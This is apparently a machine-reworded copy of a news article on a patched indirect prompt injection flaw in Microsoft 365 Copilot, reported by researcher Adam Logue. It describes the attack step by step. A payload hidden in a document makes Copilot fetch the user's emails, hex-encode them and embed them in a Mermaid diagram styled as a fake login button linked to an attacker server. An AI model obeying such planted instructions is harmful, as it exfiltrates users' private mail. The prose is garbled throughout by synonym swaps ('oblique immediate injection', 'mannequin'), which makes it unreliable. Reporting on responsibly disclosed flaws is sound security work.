up to date Microsoft mounted a safety gap in Microsoft 365 Copilot that allowed attackers to trick the AI assistant into stealing delicate tenant knowledge – like emails – through oblique immediate injection assaults.

However the researcher who discovered and reported the bug to Redmond will not get a bug bounty payout, as Microsoft decided that M365 Copilot is not in-scope for the vulnerability reward program.

The assault makes use of indirect prompt injection – embedding malicious directions right into a immediate that the mannequin can act upon, versus direct immediate injection, which entails somebody instantly submitting malicious directions to an AI system.

Researcher Adam Logue found the data-stealing exploit, which abuses M365 Copilot’s built-in help for Mermaid diagrams, a JavaScript-based instrument that permits customers to generate diagrams in utilizing textual content prompts.

Along with integrating with M365 Copilot, Mermaid diagrams additionally support CSS.

“This opens up some fascinating assault vectors for knowledge exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and may embody knowledge retrieved from different instruments within the diagram,” Logue wrote in a weblog in regards to the bug and how one can exploit it.

As a proof of idea, Logue requested M365 Copilot to summarize a specifically crafted monetary report doc with an oblique immediate injection payload hidden within the seeming innocuous “summarize this doc” immediate.

The payload makes use of M365 Copilot’s search_enterprise_emails instrument to fetch the consumer’s latest emails, and instructs the AI assistant to generate a bulleted record of the fetched contents, hex encode the output, and cut up up the string of hex-encoded output into a number of traces containing as much as 30 characters per line.

Logue then exploited M365 Copilot’s Mermaid integration to generate a diagram that regarded like a login button, plus a discover that the paperwork could not be considered except the consumer clicked the button. This pretend login button contained CSS type parts with a hyperlink to an attacker-controlled server – on this case, Logue’s Burp Collaborator server.

When a consumer clicked the button, the hex-encoded tenant knowledge – on this case, a bulleted record of latest emails – was despatched to the malicious server. From there, an attacker may decode the information and do all of the nefarious issues criminals do with stolen knowledge, like promote it to different crims, extort the sufferer for its return, uncover account numbers and/or credentials contained in the messages, and different tremendous enjoyable stuff – in case you are evil.

Logue reported the flaw to Microsoft, and Redmond informed him it patched the vulnerability, which he verified by making an attempt the assault once more and failing.

Microsoft responded to The Register after deadline, however declined to say what the patch concerned and the way it mitigated the safety concern.

“We recognize the work of Adam Logue in figuring out and responsibly reporting this by means of a coordinated disclosure,” a spokesperson stated. “We have now mounted the difficulty outlined on this report. Prospects don’t must take any motion to be shielded from this method.”

Logue didn’t obtain a payout for locating and reporting the flaw as a result of, as of now, Microsoft 365 Copilot just isn’t a product thought-about in-scope for the bug bounty program. Nevertheless, Redmond says it is at all times reviewing the printed program standards to align with evolving applied sciences and assaults, so – fingers crossed – future M365 Copilot bug hunters might earn a reward for his or her work. ®


Source link